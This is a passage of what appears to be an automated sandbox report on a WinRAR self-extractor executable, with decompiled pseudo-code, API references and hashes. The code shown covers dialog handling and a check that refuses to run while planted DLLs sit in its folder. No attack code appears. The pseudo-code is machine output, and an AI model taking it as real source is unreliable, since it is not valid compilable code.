                                                                            											E00193E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
                                                                            											_t323 = _t323 + 0x10;
                                                                            											E0019943C(_t321 - 0x3188);
                                                                            											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
                                                                            											_push(0x11);
                                                                            											_push(_t321 - 0x1164);
                                                                            											_t246 = E00199528(_t321 - 0x3188);
                                                                            											 *((char*)(_t321 + 0x13)) = _t246;
                                                                            											__eflags = _t246;
                                                                            											if(_t246 == 0) {
                                                                            												_t247 = GetLastError();
                                                                            												__eflags = _t247 - 5;
                                                                            												if(_t247 == 5) {
                                                                            													 *(_t321 + 0x17) = _t277;
                                                                            												}
                                                                            											}
                                                                            											_t39 = _t321 - 4;
                                                                            											 *_t39 =  *(_t321 - 4) | 0xffffffff;
                                                                            											__eflags =  *_t39;
                                                                            											_t169 = E0019946E(_t321 - 0x3188); // executed
                                                                            											_t285 =  *0x1d9601;
                                                                            											goto L50;
                                                                            										}
                                                                            										_t248 = GetLastError();
                                                                            										_t300 =  *((intOrPtr*)(_t321 + 0x13));
                                                                            										__eflags = _t248 - 5;
                                                                            										if(_t248 != 5) {
                                                                            											goto L43;
                                                                            										}
                                                                            										_t169 = _t277;
                                                                            										 *(_t321 + 0x17) = _t169;
                                                                            										goto L44;
                                                                            									} else {
                                                                            										_t249 = GetLastError();
                                                                            										__eflags = _t249 - 5;
                                                                            										if(_t249 == 5) {
                                                                            											L39:
                                                                            											 *(_t321 + 0x17) = _t277;
                                                                            											goto L40;
                                                                            										}
                                                                            										__eflags = _t249 - 3;
                                                                            										if(_t249 != 3) {
                                                                            											goto L40;
                                                                            										}
                                                                            										goto L39;
                                                                            									}
                                                                            								} else {
                                                                            									_t277 = 1;
                                                                            									_t182 = 1;
                                                                            									 *0x1d75d7 = 1;
                                                                            									L75:
                                                                            									__eflags =  *0x1d75cc;
                                                                            									if( *0x1d75cc <= 0) {
                                                                            										goto L26;
                                                                            									}
                                                                            									__eflags = _t182;
                                                                            									if(_t182 != 0) {
                                                                            										goto L26;
                                                                            									}
                                                                            									 *0x1d75d0 = _t277;
                                                                            									SetDlgItemTextW(_t302, _t277, E0019DA42(_t285, 0x90));
                                                                            									_t290 =  *0x1d00e0; // 0x0
                                                                            									__eflags = _t290 - 9;
                                                                            									if(_t290 != 9) {
                                                                            										__eflags = _t290 - 3;
                                                                            										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
                                                                            										__eflags = _t189;
                                                                            										 *(_t321 + 0x14) = _t189;
                                                                            										_t316 = _t189;
                                                                            									} else {
                                                                            										_t316 = 0xa0;
                                                                            									}
                                                                            									_t190 = E0019DA42(_t290, 0x96);
                                                                            									E001A9735(_t302, E0019DA42(_t290, _t316), _t190, 0x30);
                                                                            									goto L125;
                                                                            								}
                                                                            							}
                                                                            							_t277 = 1;
                                                                            							__eflags =  *0x1d75d1;
                                                                            							if( *0x1d75d1 == 0) {
                                                                            								goto L26;
                                                                            							}
                                                                            							goto L25;
                                                                            						}
                                                                            						__eflags =  *0x1efe3c;
                                                                            						if( *0x1efe3c == 0) {
                                                                            							goto L23;
                                                                            						} else {
                                                                            							__eflags =  *0x1efe3d;
                                                                            							_t254 = _t149 & 0xffffff00 |  *0x1efe3d == 0x00000000;
                                                                            							__eflags = _t254;
                                                                            							 *0x1efe3d = _t254;
                                                                            							_t255 = E0019DA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
                                                                            							_t277 = 1;
                                                                            							SetDlgItemTextW(_t302, 1, _t255);
                                                                            							while(1) {
                                                                            								__eflags =  *0x1efe3d;
                                                                            								if( *0x1efe3d == 0) {
                                                                            									goto L125;
                                                                            								}
                                                                            								__eflags =  *0x1d75d7;
                                                                            								if( *0x1d75d7 != 0) {
                                                                            									goto L125;
                                                                            								}
                                                                            								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
                                                                            								__eflags = _t259;
                                                                            								if(_t259 == 0) {
                                                                            									goto L125;
                                                                            								} else {
                                                                            									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
                                                                            									__eflags = _t261;
                                                                            									if(_t261 == 0) {
                                                                            										TranslateMessage(_t321 - 0x64);
                                                                            										DispatchMessageW(_t321 - 0x64);
                                                                            									}
                                                                            									continue;
                                                                            								}
                                                                            							}
                                                                            							goto L125;
                                                                            						}
                                                                            					}
                                                                            					_t266 = _t149 - 1;
                                                                            					__eflags = _t266;
                                                                            					if(_t266 == 0) {
                                                                            						_t277 = 1;
                                                                            						__eflags =  *0x1d75dc;
                                                                            						 *0x1d75d7 = 1;
                                                                            						if( *0x1d75dc == 0) {
                                                                            							goto L12;
                                                                            						}
                                                                            						__eflags =  *0x1d75cc;
                                                                            						if( *0x1d75cc != 0) {
                                                                            							goto L125;
                                                                            						}
                                                                            						goto L12;
                                                                            					}
                                                                            					__eflags = _t266 == 0x65;
                                                                            					if(_t266 == 0x65) {
                                                                            						_t270 = E00191217(_t302, E0019DA42(_t285, 0x64), _t321 - 0x1164);
                                                                            						__eflags = _t270;
                                                                            						if(_t270 != 0) {
                                                                            							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
                                                                            						}
                                                                            						goto L1;
                                                                            					}
                                                                            					goto L7;
                                                                            				}
                                                                            				L1:
                                                                            				_t116 = 1;
                                                                            				goto L126;
                                                                            			}

                                                                            0x001aaefc
                                                                            0x00000000
                                                                            0x001aaefc
                                                                            0x001aaeca
                                                                            0x001aaed1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aaed1
                                                                            0x001aaeb9
                                                                            0x001aaec0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aaf01
                                                                            0x001aaf01
                                                                            0x001aaf02
                                                                            0x001aaf02
                                                                            0x001aaf0a
                                                                            0x001aaf24
                                                                            0x001aaf29
                                                                            0x00000000
                                                                            0x001aadd1
                                                                            0x001aadd1
                                                                            0x001aadd3
                                                                            0x001aadd9
                                                                            0x001aadda
                                                                            0x001aaddf
                                                                            0x001aade4
                                                                            0x001aade6
                                                                            0x001aade8
                                                                            0x001aadef
                                                                            0x001aadf1
                                                                            0x001aae05
                                                                            0x001aae10
                                                                            0x001aae15
                                                                            0x001aae15
                                                                            0x001aadef
                                                                            0x001aae16
                                                                            0x001aae1c
                                                                            0x001aae6f
                                                                            0x001aae6f
                                                                            0x001aae70
                                                                            0x001aae76
                                                                            0x001aae77
                                                                            0x00000000
                                                                            0x001aae1e
                                                                            0x001aae1f
                                                                            0x001aae25
                                                                            0x001aae2b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aae2d
                                                                            0x001aae34
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aae36
                                                                            0x001aae38
                                                                            0x001aae3e
                                                                            0x001aae3f
                                                                            0x001aae44
                                                                            0x001aae4b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aae61
                                                                            0x001aae67
                                                                            0x001aae69
                                                                            0x001aa75d
                                                                            0x001aa75d
                                                                            0x001aa763
                                                                            0x001aa763
                                                                            0x001aa687
                                                                            0x001aa688
                                                                            0x001aafa4
                                                                            0x001aafa4
                                                                            0x001aafa6
                                                                            0x001aafac
                                                                            0x001aafb6
                                                                            0x001aafb6
                                                                            0x00000000
                                                                            0x001aae69
                                                                            0x001aae1c
                                                                            0x001aadcb
                                                                            0x001aa61d
                                                                            0x001aa620
                                                                            0x001aa634
                                                                            0x001aa634
                                                                            0x00000000
                                                                            0x001aa634
                                                                            0x001aa625
                                                                            0x001aa625
                                                                            0x001aa628
                                                                            0x001aa693
                                                                            0x001aa69a
                                                                            0x001aa732
                                                                            0x001aa732
                                                                            0x001aa742
                                                                            0x001aa748
                                                                            0x001aa74f
                                                                            0x001aa769
                                                                            0x001aa770
                                                                            0x001aa784
                                                                            0x001aa78a
                                                                            0x001aa791
                                                                            0x001aa793
                                                                            0x001aa7a5
                                                                            0x001aa7b4
                                                                            0x001aa7b6
                                                                            0x001aa7b6
                                                                            0x001aa7bc
                                                                            0x001aa7c2
                                                                            0x001aa7c9
                                                                            0x001aa7e6
                                                                            0x001aa7f3
                                                                            0x001aa816
                                                                            0x001aa81b
                                                                            0x001aa81e
                                                                            0x001aa7cb
                                                                            0x001aa7d0
                                                                            0x001aa7d0
                                                                            0x001aa827
                                                                            0x001aa82c
                                                                            0x001aa833
                                                                            0x001aa83c
                                                                            0x001aa83c
                                                                            0x001aa841
                                                                            0x001aa84b
                                                                            0x001aa84c
                                                                            0x001aa84f
                                                                            0x001aa85c
                                                                            0x001aa85d
                                                                            0x001aa85f
                                                                            0x001aa872
                                                                            0x001aa87e
                                                                            0x001aa880
                                                                            0x001aa883
                                                                            0x001aa885
                                                                            0x001aa898
                                                                            0x001aa898
                                                                            0x001aa89b
                                                                            0x001aa89b
                                                                            0x001aa8a1
                                                                            0x001aa8a3
                                                                            0x001aa912
                                                                            0x001aa912
                                                                            0x001aa916
                                                                            0x001aab5a
                                                                            0x001aab60
                                                                            0x001aab6a
                                                                            0x001aab82
                                                                            0x001aab88
                                                                            0x001aab95
                                                                            0x001aaba0
                                                                            0x001aaba2
                                                                            0x001aaba4
                                                                            0x001aabaf
                                                                            0x001aabaf
                                                                            0x001aabb8
                                                                            0x001aabb8
                                                                            0x001aabbe
                                                                            0x001aabc0
                                                                            0x001aabc6
                                                                            0x001aabc7
                                                                            0x001aabcc
                                                                            0x001aabce
                                                                            0x001aabd4
                                                                            0x001aabd5
                                                                            0x001aabda
                                                                            0x001aabdf
                                                                            0x001aabe0
                                                                            0x001aabe6
                                                                            0x001aabeb
                                                                            0x001aabed
                                                                            0x001aabf3
                                                                            0x001aabfa
                                                                            0x001aabfb
                                                                            0x001aac00
                                                                            0x001aac07
                                                                            0x001aac09
                                                                            0x001aac10
                                                                            0x001aac12
                                                                            0x001aac19
                                                                            0x001aac1b
                                                                            0x001aac1d
                                                                            0x001aac23
                                                                            0x001aac24
                                                                            0x001aac24
                                                                            0x001aac19
                                                                            0x001aac10
                                                                            0x001aac2c
                                                                            0x001aac31
                                                                            0x001aac31
                                                                            0x001aac38
                                                                            0x00000000
                                                                            0x001aac38
                                                                            0x001aa91c
                                                                            0x001aa923
                                                                            0x001aa923
                                                                            0x001aa926
                                                                            0x001aa926
                                                                            0x001aa928
                                                                            0x001aa92c
                                                                            0x001aa92e
                                                                            0x001aaaf0
                                                                            0x001aaaf0
                                                                            0x001aaaf4
                                                                            0x001aab04
                                                                            0x001aab1d
                                                                            0x001aab2b
                                                                            0x001aab45
                                                                            0x001aab4a
                                                                            0x001aab4a
                                                                            0x001aa685
                                                                            0x001aa685
                                                                            0x00000000
                                                                            0x001aa685
                                                                            0x001aa942
                                                                            0x001aa953
                                                                            0x001aa959
                                                                            0x001aa95e
                                                                            0x001aa97b
                                                                            0x001aa980
                                                                            0x001aa983
                                                                            0x001aa990
                                                                            0x001aa997
                                                                            0x001aa9a0
                                                                            0x001aa9b8
                                                                            0x001aa9bb
                                                                            0x001aa9c2
                                                                            0x001aa9c5
                                                                            0x001aa9c8
                                                                            0x001aa9d5
                                                                            0x001aa9d7
                                                                            0x001aa9da
                                                                            0x001aa9dc
                                                                            0x001aaa67
                                                                            0x001aa9e2
                                                                            0x001aa9e2
                                                                            0x001aa9e9
                                                                            0x001aa9ef
                                                                            0x001aa9f1
                                                                            0x001aa9fe
                                                                            0x001aa9fe
                                                                            0x001aaa0a
                                                                            0x001aaa16
                                                                            0x001aaa22
                                                                            0x001aaa2d
                                                                            0x001aaa34
                                                                            0x001aaa39
                                                                            0x001aaa57
                                                                            0x001aaa5a
                                                                            0x001aaa5f
                                                                            0x001aaa5f
                                                                            0x001aaa6e
                                                                            0x001aaa82
                                                                            0x001aaa93
                                                                            0x001aaa98
                                                                            0x001aaa9a
                                                                            0x001aaad4
                                                                            0x001aaad7
                                                                            0x00000000
                                                                            0x001aaa9c
                                                                            0x001aaaa4
                                                                            0x001aaaaa
                                                                            0x001aaaaa
                                                                            0x001aaaaa
                                                                            0x001aaaae
                                                                            0x001aaab1
                                                                            0x001aaab1
                                                                            0x001aaab4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aaab8
                                                                            0x001aaac1
                                                                            0x001aaac2
                                                                            0x001aaac5
                                                                            0x001aaac8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aaac8
                                                                            0x001aaacd
                                                                            0x001aaada
                                                                            0x001aaada
                                                                            0x001aaade
                                                                            0x001aaae1
                                                                            0x001aaaea
                                                                            0x001aaaea
                                                                            0x00000000
                                                                            0x001aaade
                                                                            0x001aaa9a
                                                                            0x001aa8a5
                                                                            0x001aa8a7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aa8c1
                                                                            0x001aa8c6
                                                                            0x001aa8cf
                                                                            0x001aa8d4
                                                                            0x001aa8de
                                                                            0x001aa8e0
                                                                            0x001aa8e7
                                                                            0x001aa8ec
                                                                            0x001aa8ef
                                                                            0x001aa8f1
                                                                            0x001aa8f3
                                                                            0x001aa8f5
                                                                            0x001aa8f8
                                                                            0x001aa8fa
                                                                            0x001aa8fa
                                                                            0x001aa8f8
                                                                            0x001aa8fd
                                                                            0x001aa8fd
                                                                            0x001aa8fd
                                                                            0x001aa907
                                                                            0x001aa90c
                                                                            0x00000000
                                                                            0x001aa90c
                                                                            0x001aa887
                                                                            0x001aa889
                                                                            0x001aa88c
                                                                            0x001aa88f

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 001AA5D6
                                                                              • Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
                                                                              • Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prologItemTextWindow
                                                                            • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                            • API String ID: 810644672-3617005944
                                                                            • Opcode ID: 24b5e2e83852b2770cfed6019540b2d08c04d2a16837e4f329c6a84c04c97ee1
                                                                            • Instruction ID: 5f4d6d7be0e8ac3f8e158d9be2c4bf9d7f0d1bf0590c2b2fe29496cc4c6dc048
                                                                            • Opcode Fuzzy Hash: 24b5e2e83852b2770cfed6019540b2d08c04d2a16837e4f329c6a84c04c97ee1
                                                                            • Instruction Fuzzy Hash: BB421875945344BFEB21AF60EC8AFFE3B68AF16700F80406AF605A64D1D7748D85CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                            			E0019FD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
                                                                            				char _v1;
                                                                            				long _v4;
                                                                            				char* _t118;
                                                                            				void* _t126;
                                                                            				int _t130;
                                                                            				long _t141;
                                                                            				int _t167;
                                                                            				_Unknown_base(*)()* _t176;
                                                                            				_Unknown_base(*)()* _t177;
                                                                            				signed char _t184;
                                                                            				struct _SECURITY_ATTRIBUTES* _t195;
                                                                            				long _t197;
                                                                            				void* _t198;
                                                                            				struct HINSTANCE__* _t201;
                                                                            				signed int _t203;
                                                                            				signed int _t205;
                                                                            				void* _t206;
                                                                            				signed int _t207;
                                                                            				int _t208;
                                                                            				void* _t210;
                                                                            
                                                                            				E001AD940();
                                                                            				_push(_t207);
                                                                            				_a3 = 0;
                                                                            				_t201 = GetModuleHandleW(L"kernel32");
                                                                            				if(_t201 == 0) {
                                                                            					L5:
                                                                            					_t118 =  *0x1cd080; // 0x1c2884
                                                                            					_t208 = _t207 | 0xffffffff;
                                                                            					_t202 = 0x800;
                                                                            					_a8 = L"version.dll";
                                                                            					_a12 = L"DXGIDebug.dll";
                                                                            					_a16 = L"sfc_os.dll";
                                                                            					_a20 = L"SSPICLI.DLL";
                                                                            					_a24 = L"rsaenh.dll";
                                                                            					_a28 = L"UXTheme.dll";
                                                                            					_a32 = L"dwmapi.dll";
                                                                            					_a36 = L"cryptbase.dll";
                                                                            					_a40 = L"lpk.dll";
                                                                            					_a44 = L"usp10.dll";
                                                                            					_a48 = L"clbcatq.dll";
                                                                            					_a52 = L"comres.dll";
                                                                            					_a56 = L"ws2_32.dll";
                                                                            					_a60 = L"ws2help.dll";
                                                                            					_a64 = L"psapi.dll";
                                                                            					_a68 = L"ieframe.dll";
                                                                            					_a72 = L"ntshrui.dll";
                                                                            					_a76 = L"atl.dll";
                                                                            					_a80 = L"setupapi.dll";
                                                                            					_a84 = L"apphelp.dll";
                                                                            					_a88 = L"userenv.dll";
                                                                            					_a92 = L"netapi32.dll";
                                                                            					_a96 = L"shdocvw.dll";
                                                                            					_a100 = L"crypt32.dll";
                                                                            					_a104 = L"msasn1.dll";
                                                                            					_a108 = L"cryptui.dll";
                                                                            					_a112 = L"wintrust.dll";
                                                                            					_a116 = L"shell32.dll";
                                                                            					_a120 = L"secur32.dll";
                                                                            					_a124 = L"cabinet.dll";
                                                                            					_a128 = L"oleaccrc.dll";
                                                                            					_a132 = L"ntmarta.dll";
                                                                            					_a136 = L"profapi.dll";
                                                                            					_a140 = L"WindowsCodecs.dll";
                                                                            					_a144 = L"srvcli.dll";
                                                                            					_a148 = L"cscapi.dll";
                                                                            					_a152 = L"slc.dll";
                                                                            					_a156 = L"imageres.dll";
                                                                            					_a160 = L"dnsapi.DLL";
                                                                            					_a164 = L"iphlpapi.DLL";
                                                                            					_a168 = L"WINNSI.DLL";
                                                                            					_a172 = L"netutils.dll";
                                                                            					_a176 = L"mpr.dll";
                                                                            					_a180 = L"devrtl.dll";
                                                                            					_a184 = L"propsys.dll";
                                                                            					_a188 = L"mlang.dll";
                                                                            					_a192 = L"samcli.dll";
                                                                            					_a196 = L"samlib.dll";
                                                                            					_a200 = L"wkscli.dll";
                                                                            					_a204 = L"dfscli.dll";
                                                                            					_a208 = L"browcli.dll";
                                                                            					_a212 = L"rasadhlp.dll";
                                                                            					_a216 = L"dhcpcsvc6.dll";
                                                                            					_a220 = L"dhcpcsvc.dll";
                                                                            					_a224 = L"XmlLite.dll";
                                                                            					_a228 = L"linkinfo.dll";
                                                                            					_a232 = L"cryptsp.dll";
                                                                            					_a236 = L"RpcRtRemote.dll";
                                                                            					_a240 = L"aclui.dll";
                                                                            					_a244 = L"dsrole.dll";
                                                                            					_a248 = L"peerdist.dll";
                                                                            					if( *_t118 == 0x78) {
                                                                            						L14:
                                                                            						GetModuleFileNameW(0,  &_a772, _t202);
                                                                            						E0019FAB1( &_a9160, E0019B943(_t223,  &_a772), _t202);
                                                                            						_t195 = 0;
                                                                            						_t203 = 0;
                                                                            						do {
                                                                            							if(E0019A995() < 0x600) {
                                                                            								_t126 = 0;
                                                                            								__eflags = 0;
                                                                            							} else {
                                                                            								_t126 = E0019FCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
                                                                            							}
                                                                            							if(_t126 == 0) {
                                                                            								L20:
                                                                            								_push(0x800);
                                                                            								E0019B9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
                                                                            								_t130 = GetFileAttributesW( &_a760); // executed
                                                                            								if(_t130 != _t208) {
                                                                            									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
                                                                            									L24:
                                                                            									if(_v1 != 0) {
                                                                            										L30:
                                                                            										_t234 = _t195;
                                                                            										if(_t195 == 0) {
                                                                            											return _t130;
                                                                            										}
                                                                            										E0019B98D(_t234,  &_a768);
                                                                            										if(E0019A995() < 0x600) {
                                                                            											_push( &_a9160);
                                                                            											_push( &_a768);
                                                                            											E00193E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
                                                                            											_t210 = _t210 + 0x18;
                                                                            											_t130 = AllocConsole();
                                                                            											__eflags = _t130;
                                                                            											if(_t130 != 0) {
                                                                            												__imp__AttachConsole(GetCurrentProcessId());
                                                                            												_t141 = E001B2B33( &_a4860);
                                                                            												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
                                                                            												Sleep(0x2710);
                                                                            												_t130 = FreeConsole();
                                                                            											}
                                                                            										} else {
                                                                            											E0019FCFD(L"dwmapi.dll");
                                                                            											E0019FCFD(L"uxtheme.dll");
                                                                            											_push( &_a9152);
                                                                            											_push( &_a760);
                                                                            											E00193E41( &_a4852, 0x864, E0019DA42(_t185, 0xf1), _t195);
                                                                            											_t210 = _t210 + 0x18;
                                                                            											_t130 = E001A9735(0,  &_a4848, E0019DA42(_t185, 0xf0), 0x30);
                                                                            										}
                                                                            										ExitProcess(0);
                                                                            									}
                                                                            									_t205 = 0;
                                                                            									while(1) {
                                                                            										_push(0x800);
                                                                            										E0019B9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
                                                                            										_t130 = GetFileAttributesW( &_a756);
                                                                            										if(_t130 != _t208) {
                                                                            											break;
                                                                            										}
                                                                            										_t205 = _t205 + 1;
                                                                            										if(_t205 < 0x35) {
                                                                            											continue;
                                                                            										}
                                                                            										goto L30;
                                                                            									}
                                                                            									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
                                                                            									goto L30;
                                                                            								}
                                                                            							} else {
                                                                            								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x24 + _t203 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
                                                                            								_t227 = _t130 - 2;
                                                                            								if(_t130 != 2) {
                                                                            									goto L21;
                                                                            								}
                                                                            								goto L20;
                                                                            							}
                                                                            							L21:
                                                                            							_t203 = _t203 + 1;
                                                                            						} while (_t203 < 8);
                                                                            						goto L24;
                                                                            					}
                                                                            					_t197 = E001B6662(_t185, _t118);
                                                                            					_pop(_t185);
                                                                            					if(_t197 == 0) {
                                                                            						goto L14;
                                                                            					}
                                                                            					GetModuleFileNameW(0,  &_a4868, 0x800);
                                                                            					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
                                                                            					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
                                                                            						L13:
                                                                            						CloseHandle(_t206);
                                                                            						_t202 = 0x800;
                                                                            						goto L14;
                                                                            					} else {
                                                                            						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
                                                                            						_t222 = _t167;
                                                                            						if(_t167 == 0) {
                                                                            							goto L13;
                                                                            						}
                                                                            						_t185 = 0;
                                                                            						_push(0x104);
                                                                            						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
                                                                            						_push( &_a252);
                                                                            						_push( &_a13260);
                                                                            						while(1) {
                                                                            							_t198 = E0019F835(_t222);
                                                                            							_t223 = _t198;
                                                                            							if(_t198 == 0) {
                                                                            								goto L13;
                                                                            							}
                                                                            							E0019FCFD( &_a252);
                                                                            							_push(0x104);
                                                                            							_push( &_a248);
                                                                            							_push(_t198);
                                                                            						}
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
                                                                            				_t184 = _a46032;
                                                                            				if(_t176 != 0) {
                                                                            					asm("sbb ecx, ecx");
                                                                            					_t185 =  ~(_t184 & 0x000000ff) & 0x001c22e4;
                                                                            					 *_t176( ~(_t184 & 0x000000ff) & 0x001c22e4);
                                                                            				}
                                                                            				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
                                                                            				if(_t177 != 0) {
                                                                            					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
                                                                            					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
                                                                            					_v1 = 1;
                                                                            				}
                                                                            				goto L5;
                                                                            			}

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32 ref: 0019FD61
                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0019FD79
                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0019FD9C
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001A0047
                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001A005F
                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001A0071
                                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,001C28D4,00000000), ref: 001A0090
                                                                            • CloseHandle.KERNEL32(00000000), ref: 001A00E8
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001A00FE
                                                                            • CompareStringW.KERNELBASE(00000400,00001001,001C2920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001A0158
                                                                            • GetFileAttributesW.KERNELBASE(?,?,001C28EC,00000800,?,00000000,?,00000800), ref: 001A0181
                                                                            • GetFileAttributesW.KERNEL32(?,?,001C29AC,00000800), ref: 001A01BA
                                                                              • Part of subcall function 0019FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
                                                                              • Part of subcall function 0019FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A
                                                                            • _swprintf.LIBCMT ref: 001A022A
                                                                            • _swprintf.LIBCMT ref: 001A0276
                                                                              • Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54
                                                                            • AllocConsole.KERNEL32 ref: 001A027E
                                                                            • GetCurrentProcessId.KERNEL32 ref: 001A0288
                                                                            • AttachConsole.KERNEL32(00000000), ref: 001A028F
                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001A02B5
                                                                            • WriteConsoleW.KERNEL32(00000000), ref: 001A02BC
                                                                            • Sleep.KERNEL32(00002710), ref: 001A02C7
                                                                            • FreeConsole.KERNEL32 ref: 001A02CD
                                                                            • ExitProcess.KERNEL32 ref: 001A02D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                            • API String ID: 1201351596-3298887752
                                                                            • Opcode ID: b8677bfa28c1425567493b2310c77e123a0271cc2d9d673883dfa2ff0a0e2924
                                                                            • Instruction ID: fdb958b9aeb9c9e351c2a2827e9829d3e0c7f1a965ddf6356247e11fd50612fb
                                                                            • Opcode Fuzzy Hash: b8677bfa28c1425567493b2310c77e123a0271cc2d9d673883dfa2ff0a0e2924
                                                                            • Instruction Fuzzy Hash: 2AD17DB1008384ABD735DF50C949FDFBBE8BBA5704F50491DF589AA240CBB0C549CBA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

